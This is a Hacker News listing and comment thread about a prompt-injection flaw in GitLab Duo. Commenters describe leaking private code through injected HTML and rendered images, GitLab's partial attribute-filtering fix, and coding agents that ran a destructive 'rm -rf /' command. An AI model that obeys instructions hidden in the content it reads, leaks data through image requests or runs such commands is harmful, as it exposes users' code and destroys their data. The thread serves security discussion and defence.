frontpage.
Slint: Cross Platform UI Library

https://slint.dev/
1•Palmik•3m ago•0 comments

AI and Education: Generative AI and the Future of Critical Thinking

https://www.youtube.com/watch?v=k7PvscqGD24
1•nyc111•3m ago•0 comments

Maple Mono: Smooth your coding flow

https://font.subf.dev/en/
1•signa11•4m ago•0 comments

Moltbook isn't real but it can still hurt you

https://12gramsofcarbon.com/p/tech-things-moltbook-isnt-real-but
1•theahura•8m ago•0 comments

Take Back the Em Dash–and Your Voice

https://spin.atomicobject.com/take-back-em-dash/
1•ingve•8m ago•0 comments

Show HN: 289x speedup over MLP using Spectral Graphs

https://zenodo.org/login/?next=%2Fme%2Fuploads%3Fq%3D%26f%3Dshared_with_me%25253Afalse%26l%3Dlist...
1•andrespi•9m ago•0 comments

Teaching Mathematics

https://www.karlin.mff.cuni.cz/~spurny/doc/articles/arnold.htm
1•samuel246•12m ago•0 comments

3D Printed Microfluidic Multiplexing [video]

https://www.youtube.com/watch?v=VZ2ZcOzLnGg
2•downboots•12m ago•0 comments

Abstractions Are in the Eye of the Beholder

https://software.rajivprab.com/2019/08/29/abstractions-are-in-the-eye-of-the-beholder/
2•whack•12m ago•0 comments

Show HN: Routed Attention – 75-99% savings by routing between O(N) and O(N²)

https://zenodo.org/records/18518956
1•MikeBee•12m ago•0 comments

We didn't ask for this internet – Ezra Klein show [video]

https://www.youtube.com/shorts/ve02F0gyfjY
1•softwaredoug•13m ago•0 comments

The Real AI Talent War Is for Plumbers and Electricians

https://www.wired.com/story/why-there-arent-enough-electricians-and-plumbers-to-build-ai-data-cen...
2•geox•16m ago•0 comments

Show HN: MimiClaw, OpenClaw (Clawdbot) on $5 Chips

https://github.com/memovai/mimiclaw
1•ssslvky1•16m ago•0 comments

How I Maintain My Blog in the Age of Agents

https://www.jerpint.io/blog/2026-02-07-how-i-maintain-my-blog-in-the-age-of-agents/
3•jerpint•17m ago•0 comments

The Fall of the Nerds

https://www.noahpinion.blog/p/the-fall-of-the-nerds
1•otoolep•18m ago•0 comments

I'm 15 and built a free tool for reading Greek/Latin texts. Would love feedback

https://the-lexicon-project.netlify.app/
2•breadwithjam•21m ago•1 comment

How close is AI to taking my job?

https://epoch.ai/gradient-updates/how-close-is-ai-to-taking-my-job
1•cjbarber•22m ago•0 comments

You are the reason I am not reviewing this PR

https://github.com/NixOS/nixpkgs/pull/479442
2•midzer•23m ago•1 comment

Show HN: FamilyMemories.video – Turn static old photos into 5s AI videos

https://familymemories.video
1•tareq_•25m ago•0 comments

How Meta Made Linux a Planet-Scale Load Balancer

https://softwarefrontier.substack.com/p/how-meta-turned-the-linux-kernel
1•CortexFlow•25m ago•0 comments

A Turing Test for AI Coding

https://t-cadet.github.io/programming-wisdom/#2026-02-06-a-turing-test-for-ai-coding
2•phi-system•25m ago•0 comments

How to Identify and Eliminate Unused AWS Resources

https://medium.com/@vkelk/how-to-identify-and-eliminate-unused-aws-resources-b0e2040b4de8
3•vkelk•26m ago•0 comments

A2CDVI – HDMI output from the Apple IIc's digital video output connector

https://github.com/MrTechGadget/A2C_DVI_SMD
2•mmoogle•26m ago•0 comments

CLI for Common Playwright Actions

https://github.com/microsoft/playwright-cli
3•saikatsg•28m ago•0 comments

Would you use an e-commerce platform that shares transaction fees with users?

https://moondala.one/
1•HamoodBahzar•29m ago•1 comment

Show HN: SafeClaw – a way to manage multiple Claude Code instances in containers

https://github.com/ykdojo/safeclaw
3•ykdojo•32m ago•0 comments

The Future of the Global Open-Source AI Ecosystem: From DeepSeek to AI+

https://huggingface.co/blog/huggingface/one-year-since-the-deepseek-moment-blog-3
3•gmays•33m ago•0 comments

The Evolution of the Interface

https://www.asktog.com/columns/038MacUITrends.html
2•dhruv3006•34m ago•1 comment

Azure: Virtual network routing appliance overview

https://learn.microsoft.com/en-us/azure/virtual-network/virtual-network-routing-appliance-overview
3•mariuz•35m ago•0 comments

Seedance2 – multi-shot AI video generation

https://www.genstory.app/story-template/seedance2-ai-story-generator
2•RyanMu•38m ago•1 comment

Remote Prompt Injection in GitLab Duo Leads to Source Code Theft

https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo
214•chillax•8mo ago

Comments

nusl•8mo ago
GitLab's remediation seems a bit sketchy at best.
reddalo•8mo ago
The whole "let's put LLMs everywhere" thing is sketchy at best.
edelbitter•8mo ago
I wonder what is so special about onerror, onload and onclick that they need to be positively enumerated - as opposed to the 30 (?) other attributes with equivalent injection utility.
M4v3R•8mo ago
That was my thought too. They didn’t fix the underlying problem; they’ve just patched two possible exfiltration methods. I’m sure some clever people will find other ways to misuse their assistant.
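To make that concrete: a denylist that strips only onerror, onload and onclick leaves every other executable attribute intact. A minimal sketch of the failure mode using Python's stdlib HTML parser; the denylist simply mirrors the three attributes named above, and the tags fed in are illustrative:

  from html.parser import HTMLParser

  # The three handlers reportedly enumerated by the fix.
  DENYLIST = {"onerror", "onload", "onclick"}

  class AttrAudit(HTMLParser):
      # Report which executable attributes a denylist would let through.
      def handle_starttag(self, tag, attrs):
          for name, _value in attrs:
              if name.startswith("on") or name == "formaction":
                  verdict = "stripped" if name in DENYLIST else "slips through"
                  print(f"<{tag} {name}=...> {verdict}")

  AttrAudit().feed(
      '<img src=x onerror=alert(1)>'        # caught
      '<img src=x onmouseover=alert(1)>'    # not caught
      '<video src=x onloadstart=alert(1)>'  # not caught
      '<button formaction="https://evil.example">x</button>'  # not caught
  )

An allowlist that keeps only known-inert attributes (src, alt, href, ...) inverts the default and fails closed instead of open.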
gloosx•8mo ago
I'm pretty sure they vibecoded the whole thing all along
cedws•8mo ago
Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
hu3•8mo ago
I would have the same caution if my code were at all special.

But the reality is I'm very well compensated to summon CRUD slop out of thin air. It's well tested though.

I wish good luck to those who steal my code.

mdaniel•8mo ago
You say code as if the intellectual property is the thing an attacker is after, but my experience has been that folks often put all kinds of secrets in code thinking that the "private repo" is a strong enough security boundary

I absolutely am not implying you are one of them, merely that the risk is not the same for all slop crud apps universally

tough•8mo ago
People don't know GitHub can manage secrets in its environment for CI?

Another interesting fact is that most big vendors pay for GitHub to scan for leaked secrets and auto-revoke them if a public repo contains any (a regex string matches sk-xxx <- it's a Stripe key).

That's one of the reasons vendors use unique, greppable API key prefixes with the vendor's name baked in.
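Those prefixes are what make scanning cheap. A minimal sketch of such a scanner; the Stripe (sk_live_), GitHub (ghp_) and AWS (AKIA) prefixes are real conventions, while the exact length patterns and the function around them are illustrative:

  import re

  # Vendor-chosen prefixes identify whose key leaked, so a scanner knows
  # whom to notify and which revocation API to call.
  PATTERNS = {
      "stripe_secret":  re.compile(r"sk_live_[0-9a-zA-Z]{24,}"),
      "github_pat":     re.compile(r"ghp_[0-9a-zA-Z]{36}"),
      "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
  }

  def scan(text: str) -> list[tuple[str, str]]:
      # Return (vendor, matched key) pairs found in a blob of text.
      return [(name, m.group())
              for name, pat in PATTERNS.items()
              for m in pat.finditer(text)]

  print(scan('config = {"key": "sk_live_' + "a" * 24 + '"}'))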

mdaniel•8mo ago
You're mistaking "know" for "care," since my experience has been that people know way more than they care.

And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo : - \

tough•8mo ago
I also remember reading about how, due to the way the git backend works, your private repos' branches could get exposed to the public, so yeah, don't treat a repository as a private password manager.

Good point, the scanner doesn't work on private repos =(

danpalmer•8mo ago
Prompt injection is unlikely to be fixed. I'd stop thinking about LLMs as software where you can with enough effort just fix a SQL injection vulnerability, and start thinking about them like you'd think about insider risk from employees.

That's not to say that they are employees or perform at that level, they don't, but it's to say that LLM behaviours are fuzzy and ill-defined, like humans. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to have a range of solutions applied together and some amount of trust. If we think about LLMs this way I think the conversation around security will be much more productive.

LegionMammal978•8mo ago
The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time, until it gets updated. So far, the main mitigation in practice has been fiddling with the system prompts to patch up the known holes.
thaumasiotes•8mo ago
> The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time

Why? Output isn't deterministic.

LegionMammal978•8mo ago
Perhaps not, but the same input will lead to the same distribution of outputs, so all an attacker has to do is design something that works with reasonable probability on their end, and everyone else's instances of the LLM will automatically be vulnerable. The same way a pest or disease can devastate a population of cloned plants, even if each one grows slightly differently.
thaumasiotes•8mo ago
OK, but that's also the way attacking a bunch of individuals who can get tricked works.
zwnow•8mo ago
To trick individuals you first have to contact them somehow. To trick an LLM you can just spam prompts.
thaumasiotes•8mo ago
You email them. It's called phishing.
throwaway314155•8mo ago
Right and now there's a new vector for an old concept.
zwnow•8mo ago
Employees usually know not to click on random shit they get sent. Most mails already get filtered before they even reach the employee. Good luck actually achieving something with phishing mails.
thaumasiotes•8mo ago
When I was at NCC Group, we had a policy about phishing in penetration tests.

The policy was "we'll do it if the customer asks for it, but we don't recommend it, because the success rate is 100%".

bluefirebrand•8mo ago
How can you ever get that lower than 100% if you don't do the test to identify which employees need to be trained / monitored because they fall for phishing?
Retr0id•8mo ago
You can still experimentally determine a strategy that works x% of the time, against a particular model. And you can keep refining it "offline" until x=99. (where "offline" just means invisible to the victim, not necessarily a local model)
33hsiidhkl•8mo ago
It absolutely is deterministic, for any given seed value. Same seed = same output, every time, which is by definition deterministic.
tough•8mo ago
Only if temperature is 0, but are they truly deterministic? I thought transformer-based LLMs were not.
33hsiidhkl•8mo ago
Temperature does not affect token prediction in the way you think. The seed value is still the seed value before temperature calculations are performed; the randomness of an LLM is not related to its temperature. The seed value is what determines the output: for a specific seed value, say 42069, the LLM will always generate the same output, given the same input and the same temperature.
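What the seed pins down is the sampling draw, not the shape of the distribution. A toy sketch of temperature sampling, not any vendor's real stack (and note that in practice, batching and floating-point reduction order on GPUs can still introduce nondeterminism this toy model doesn't capture):

  import math, random

  def sample_token(logits, temperature, seed):
      # Temperature rescales the distribution; the seed fixes the draw.
      rng = random.Random(seed)
      scaled = [l / temperature for l in logits]
      m = max(scaled)  # subtract the max for numerical stability
      weights = [math.exp(l - m) for l in scaled]
      return rng.choices(range(len(logits)), weights=weights)[0]

  logits = [2.0, 1.0, 0.5]
  # Same seed + same input -> the same token, even at temperature 0.8.
  print([sample_token(logits, 0.8, seed=42069) for _ in range(5)])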
tough•8mo ago
Thank you, I thought this wasn't the case (like it is with diffusion image models)

TIL

M4v3R•8mo ago
DeepMind recently did some great work in this area: https://news.ycombinator.com/item?id=43733683

The method they presented, if implemented correctly, apparently can effectively stop most prompt injection vectors

johnisgood•8mo ago
I keep it manual, too, and I think I am better off for doing so.
TechDebtDevin•8mo ago
Cursor deleted my entire Linux user and soft reset my OS, so I don't blame you.
raphman•8mo ago
Why and how?
tough•8mo ago
An agent does rm -rf /.

I think I saw it do it, or try to, and my computer shut down and restarted (Mac).

Maybe it just deleted the project lol.

These LLMs are really bad at keeping track of the real world, so they might think they're in the project folder when they've just navigated back with cd to the user's home, and so shit happens.

Honestly, one should only run these in controlled environments like VMs or Docker.

but YOLO amirite

margalabargala•8mo ago
That people allow these agents to just run arbitrary commands against their primary install is wild.

Part of this is the tool's fault. Anything like that should be done in a chroot.

Anything less is basically "twitch plays terminal" on your machine.
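A chroot, container, or VM all buy the same property: the blast radius of an agent-proposed command is the sandbox, not your primary install. A minimal sketch assuming Docker is available; the wrapper is illustrative, not any particular agent tool's API:

  import subprocess

  def run_sandboxed(cmd: str, project_dir: str) -> subprocess.CompletedProcess:
      # Run an agent-proposed shell command in a throwaway container.
      # It sees only the mounted project dir, has no network, and is
      # deleted afterwards -- so rm -rf / nukes the sandbox, not you.
      return subprocess.run(
          [
              "docker", "run", "--rm",
              "--network", "none",           # no exfiltration, no curl|sh
              "--read-only",                 # immutable image filesystem
              "-v", f"{project_dir}:/work",  # the only writable path
              "-w", "/work",
              "alpine:3", "sh", "-c", cmd,
          ],
          capture_output=True, text=True, timeout=60,
      )

  print(run_sandboxed("ls && echo done", "/tmp/myproject").stdout)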

tough•8mo ago
Codex at least has limitations on what folders it can operate in.
serf•8mo ago
A large part of the benefit of an agentic AI is that it can coordinate tests it automatically wrote against an existing code base, and a lot of the time the only way to get decent answers out of something like that is to let it run as close to bare metal as it can. I run Cursor and the accompanying agents in a snapshotted VM for this purpose. It's not much different from what you suggest, but the layer of abstraction is far enough away for admin-privileged app testing, an unfortunate reality for certain personal projects.

I haven't had a Cursor install nuke itself yet, but I have had one fiddling in a parent folder it shouldn't have been able to touch with workspace protection on.

TechDebtDevin•8mo ago
This is what happened. I was testing Claude 4 and asked it to create a simple 1K LOC Fyne Android app. I have my repos stored outside of my Linux user, so the work it created was preserved. It essentially created a bash file that ran cd ~ && rm -rf /. All settings reset and documents/downloads disappeared lmfao. I don't ever really use my OS as primary storage, and any config or file of importance is backed up twice, so it wasn't a big deal, but it was quite perplexing for a sec.
tough•8mo ago
If you think deeply about it, it's a kind of hara-kiri for an AI to remove the whole system it's operating on.

Yeah, Claude 4 can go too far sometimes.

TechDebtDevin•8mo ago
rm -rf /
sunnybeetroot•8mo ago
Cursor by default asks before executing commands; sounds like you had auto-run commands on…
mdaniel•8mo ago
Running Duo as a system user was crazypants and I'm sad that GitLab fell into that trap. They already have personal access tokens, so even if they had to silently create one just for use with Duo, that would be a marked improvement over giving an LLM read access to every repo in the platform.
wunderwuzzi23•8mo ago
Great work!

Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.

I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in the past, with 10+ findings across vendors.

GitHub Copilot Chat had a very similar bug last year.
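The image-rendering channel is simple enough to sketch end to end. Everything below is illustrative (attacker.example is a placeholder): injected instructions make the assistant emit a markdown image whose URL carries the data, and the victim's browser makes the request the moment the chat UI renders it:

  import base64, urllib.parse

  # What the injected prompt asks the assistant to emit.
  stolen = "snippet from a private repo"
  payload = base64.urlsafe_b64encode(stolen.encode()).decode()
  markdown = f"![status](https://attacker.example/pixel.png?d={payload})"
  print(markdown)

  # Attacker-side, recovery is just parsing the query string back out.
  url = markdown[markdown.index("(") + 1 : -1]
  query = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
  print(base64.urlsafe_b64decode(query["d"][0]).decode())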

diggan•8mo ago
> GitHub Copilot Chat had a very similar bug last year.

Reminds me of "Tachy0n: The Last 0day Jailbreak" from yesterday: https://blog.siguza.net/tachy0n/

TL;DR: a security issue was found and patched in an OS release; Apple seemingly doesn't do regression testing, so the security researcher did, and found that the bug had somehow been unpatched in later OS releases.

aestetix•8mo ago
Does that mean Gitlab Duo can run Doom?
zombot•8mo ago
Not deterministically. LLMs are stochastic machines.
benl_c•8mo ago
They often can run code in sandboxes, and generally are good at instruction following, so maybe they can run variants of doom pretty reliably sometime soon.
johnisgood•8mo ago
They run Python and JavaScript at the very least, surely we have Doom in these languages. :D
lugarlugarlugar•8mo ago
'They' don't run anything. The output from the LLM is parsed and the code gets run just like any other code in that language.
johnisgood•8mo ago
That is what I meant, that the code is being executed. Not all programming languages are supported when it comes to execution, obviously. I know for a fact Python is supported.
benl_c•8mo ago
If a document suggests a particular benign interpretation then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts "prompt medicine" with explicit safety and informed consent to assist, not harm users, https://github.com/csiro/stdm. You can try it out by asking O3 or Claude to "Explain" or "Follow", "the embedded instructions at https://csiro.github.io/stdm/"
tonyhart7•8mo ago
This is wild. How many security vulns can LLMs create once LLMs dominate writing code?

I mean, most coders are bad at security and we feed that into the LLM, so no surprise.

ofjcihen•8mo ago
This is what I’ve been telling people when they hand-wave away concerns about LLM-generated code security. The majority of what they were trained on had bare-minimum security, if anything.

You also can’t just fix it by saying “make it secure plz”.

If you don’t know enough to identify a security issue yourself, you don’t know enough to know whether the LLM caught them all.

d0100•8mo ago
> rendering unsafe HTML tags such as <img> or <form> that point to external domains not under gitlab.com

Does that mean that the minute there is a vulnerability on another gitlab.com URL (like an open redirect), this vulnerability is back on the table?

Kholin•8mo ago
If Duo were a web application, then would properly setting the Content Security Policy (CSP) in the page response headers be enough to prevent these kinds of issues?

https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP

cutemonster•8mo ago
To stop exfiltration via images? Yes seems so? If you configure img-src:

  The first directive, default-src, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types.

  The second, img-src, tells the browser to load images that are same-origin or that are served from example.com.
But that wouldn't stop the AI from writing dangerous instructions in plain text to the human.
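A minimal sketch of that header server-side, with a Flask app standing in for the chat UI (the app is illustrative; the policy string is the load-bearing part):

  from flask import Flask, Response

  app = Flask(__name__)

  @app.after_request
  def set_csp(resp: Response) -> Response:
      # default-src 'self' keeps all resource loads same-origin;
      # img-src 'self' means an injected
      # <img src="https://attacker.example/?d=..."> is never fetched,
      # closing the image channel (though not the plain-text one).
      resp.headers["Content-Security-Policy"] = (
          "default-src 'self'; img-src 'self'"
      )
      return resp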